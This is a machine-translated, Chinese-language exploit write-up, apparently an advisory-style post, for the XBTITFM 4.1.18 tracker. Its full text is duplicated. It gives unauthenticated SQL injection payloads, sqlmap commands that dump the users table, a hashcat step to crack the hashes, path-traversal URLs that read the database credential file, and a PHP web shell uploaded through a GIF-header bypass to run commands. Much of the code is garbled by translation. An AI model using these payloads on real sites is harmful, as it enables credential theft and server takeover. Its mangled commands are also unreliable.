#利用title: xbtitfm 4.1.18多个漏洞
#日期: 22-01-2024
#供应商homepage3360 https://xbtitfm.eu
#受影响的版本: 4.1.18和先验
#Description: SQLI和路径遍历未经身份验证,它们不需要任何用户交互被利用,并且存在于XBTITFM的默认配置中。
不安全的文件上传需要启用File_ -Hosting功能(HACK)。如果没有,可以通过访问管理员帐户来启用它。
查看国家和代码库的时代可能还有更多,但是谁在乎.
[未经验证的SQL注入-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:U/C33:H/I3:H/I3:H
一些示例:
获取DB名称:
/shoutedit.php?action=editmsgid=1337和extractValue(0,concat(0,0,(ifnull(ifnull(cast(databa se(databa se(n n char))为nchar),0),1,100))))))))))))))))))))))))))))
获取数据库用户:
/shoutedit.php?action=editmsgid=1337和extractValue(0,concat(0,0,(ifnull(ifnull(cast(curren t_user()为nchar),nchar),0),1,100)))))))))))))))))))))))))))))
获取任何用户的密码哈希(为什么需要进行一些修改才能在不同的情况下使用):
/shouteDit.php?action=editmsgid=1337或(1,1)=(选择count(0),concat((选择concat_ws(0x3a,id,id,用户名,密码,email,email,email,emaim,nemy necy dx3a3a3a),来自xbtit_users xbtit_users xbtit_users eusername='admine_username_username_or_or_or_or_or_or_or_or__er_er_wheate_yyy_yyyyyyyyyyyyyyyyouey(0) (信息_schema.tables)组2);
使用SQLMAP自动化它以转储数据库。
1)获取数据库名称
sqlmap -u'https://example.xyz/shoutedit.php?action=editmsgid=1337'-p msgid -pechnique=e -andwers=e -asswers='include=n inclage=n' - batch -batch -current -db
2)获取表名称
sqlmap -u'https://example.xyz/shoutedit.php?action=editmsgid=1337'-p msgid -pechnique=e -asswers='inclage='inclage=n' - batch -d the_iendiedified_dideified_database_database_name-tabase-tabase-tabase-tabase-tabase-tabase-tabase-taber
3)转储用户表(通常称为xbtit_users)
sqlmap -u 'https://example.xyz/shoutedit.php?action=editmsgid=1337' -p msgid --technique=E --answers='include=N' --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump
4)裂纹哈希(通常是无盐MD5,是的!)
hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt
Pro TIP:使用多个p(https://weakpass.com/all-in--one)
[未经身份验证的路径遍历-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S3:U/C:U/C33:H/I3:N/I3:N/A:N]
1)故意搜索不存在以获取Web应用程序路径的文件,例如(/home/xbtitfm/public_html/)
https [:] //example.xyz/nfo/nfogen.php?nfo=random_value_value_to_get_get_error_that_reve_reve als_the_real_path
2)读取包含数据库凭据的文件。
https [:] //example.xyz/nfo/nfogogen.php?nfo=./././././././././././././././home/home/xbtitfm/public_html/include/include/include/setting/settings.php
https [:] //example.xyz/nfo/nfogogen.php?nfo=./././././././././././././././home/home/xbtitfm/public_html/include/include/include/update.php
或您想要的任何其他系统文件。
https [:] //example.xyz/nfo/nfogen.php?
3)现在,当您拥有此宝石时,谁需要SQLI抛弃数据库?检查是否配置了以下文件
https [:] //example.xyz/nfo/nfogogen.php?nfo=./././././././././././././././home/home/xbtitfm/public_html/sxdml/sxd/sxd/cfg.php
如果是这样,请访问https [:] //commend.xyz/sxd(CBT SQL备份lutilitiy aka aka sypex-dumper),使用您刚找到的DB凭证登录,现在以单击时导出DB。很好,容易。
[INSECURE文件上传- 远程代码执行(验证)-CVSS:3.0/AV:N/AC3:L/PR3:H/UI3:N/S3:U/S3:U/C33:H
如果还不够,您想要RCE,请访问https [:] //example.xyz/index.php?page=file_hosting
如果启用了文件托管功能(hack),则只需上传以下旁路的PHP外壳即可。
将文件类型更改为image/gif,并将第一个字节更改为gif89a;足以绕过Filetype检查。
对PHP文件的愚蠢对策,因此请确保您将php更改为php以绕过它。
content-disposition: form-data;名称='文件'; filename='肯定_not_a_shell.php'
content-type:图像/gif
GIF89A;
html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
系统($ _ get ['cmd']);
}
?
/pre
/身体
/html
然后,网络外壳将在此处上传:
https [:] //example.xyz/file_hosting/definedly_not_a_shell.php
如果禁用文件托管功能,请提取并破解管理员的哈希,然后从管理面板中启用该功能并上传外壳。
#日期: 22-01-2024
#供应商homepage3360 https://xbtitfm.eu
#受影响的版本: 4.1.18和先验
#Description: SQLI和路径遍历未经身份验证,它们不需要任何用户交互被利用,并且存在于XBTITFM的默认配置中。
不安全的文件上传需要启用File_ -Hosting功能(HACK)。如果没有,可以通过访问管理员帐户来启用它。
查看国家和代码库的时代可能还有更多,但是谁在乎.
[未经验证的SQL注入-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:U/C33:H/I3:H/I3:H
一些示例:
获取DB名称:
/shoutedit.php?action=editmsgid=1337和extractValue(0,concat(0,0,(ifnull(ifnull(cast(databa se(databa se(n n char))为nchar),0),1,100))))))))))))))))))))))))))))
获取数据库用户:
/shoutedit.php?action=editmsgid=1337和extractValue(0,concat(0,0,(ifnull(ifnull(cast(curren t_user()为nchar),nchar),0),1,100)))))))))))))))))))))))))))))
获取任何用户的密码哈希(为什么需要进行一些修改才能在不同的情况下使用):
/shouteDit.php?action=editmsgid=1337或(1,1)=(选择count(0),concat((选择concat_ws(0x3a,id,id,用户名,密码,email,email,email,emaim,nemy necy dx3a3a3a),来自xbtit_users xbtit_users xbtit_users eusername='admine_username_username_or_or_or_or_or_or_or_or__er_er_wheate_yyy_yyyyyyyyyyyyyyyyouey(0) (信息_schema.tables)组2);
使用SQLMAP自动化它以转储数据库。
1)获取数据库名称
sqlmap -u'https://example.xyz/shoutedit.php?action=editmsgid=1337'-p msgid -pechnique=e -andwers=e -asswers='include=n inclage=n' - batch -batch -current -db
2)获取表名称
sqlmap -u'https://example.xyz/shoutedit.php?action=editmsgid=1337'-p msgid -pechnique=e -asswers='inclage='inclage=n' - batch -d the_iendiedified_dideified_database_database_name-tabase-tabase-tabase-tabase-tabase-tabase-tabase-taber
3)转储用户表(通常称为xbtit_users)
sqlmap -u 'https://example.xyz/shoutedit.php?action=editmsgid=1337' -p msgid --technique=E --answers='include=N' --batch -D the_identified_database_name -T xbtit_users -C id,username,email,cip,dob,password,salt,secret --dump
4)裂纹哈希(通常是无盐MD5,是的!)
hashcat -m 0 xbtitfm_exported_hashes.txt wordlist.txt
Pro TIP:使用多个p(https://weakpass.com/all-in--one)
[未经身份验证的路径遍历-CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S3:U/C:U/C33:H/I3:N/I3:N/A:N]
1)故意搜索不存在以获取Web应用程序路径的文件,例如(/home/xbtitfm/public_html/)
https [:] //example.xyz/nfo/nfogen.php?nfo=random_value_value_to_get_get_error_that_reve_reve als_the_real_path
2)读取包含数据库凭据的文件。
https [:] //example.xyz/nfo/nfogogen.php?nfo=./././././././././././././././home/home/xbtitfm/public_html/include/include/include/setting/settings.php
https [:] //example.xyz/nfo/nfogogen.php?nfo=./././././././././././././././home/home/xbtitfm/public_html/include/include/include/update.php
或您想要的任何其他系统文件。
https [:] //example.xyz/nfo/nfogen.php?
3)现在,当您拥有此宝石时,谁需要SQLI抛弃数据库?检查是否配置了以下文件
https [:] //example.xyz/nfo/nfogogen.php?nfo=./././././././././././././././home/home/xbtitfm/public_html/sxdml/sxd/sxd/cfg.php
如果是这样,请访问https [:] //commend.xyz/sxd(CBT SQL备份lutilitiy aka aka sypex-dumper),使用您刚找到的DB凭证登录,现在以单击时导出DB。很好,容易。
[INSECURE文件上传- 远程代码执行(验证)-CVSS:3.0/AV:N/AC3:L/PR3:H/UI3:N/S3:U/S3:U/C33:H
如果还不够,您想要RCE,请访问https [:] //example.xyz/index.php?page=file_hosting
如果启用了文件托管功能(hack),则只需上传以下旁路的PHP外壳即可。
将文件类型更改为image/gif,并将第一个字节更改为gif89a;足以绕过Filetype检查。
对PHP文件的愚蠢对策,因此请确保您将php更改为php以绕过它。
content-disposition: form-data;名称='文件'; filename='肯定_not_a_shell.php'
content-type:图像/gif
GIF89A;
html
身体
form method='get'name='?php echo basename($ _ server ['php_self']);
输入类型='text'名称='cmd'autocus id='cmd'size='80'
输入类型='submit'value='execute'
/形式
pre
php
if(isset($ _ get ['cmd']))
{
系统($ _ get ['cmd']);
}
?
/pre
/身体
/html
然后,网络外壳将在此处上传:
https [:] //example.xyz/file_hosting/definedly_not_a_shell.php
如果禁用文件托管功能,请提取并破解管理员的哈希,然后从管理面板中启用该功能并上传外壳。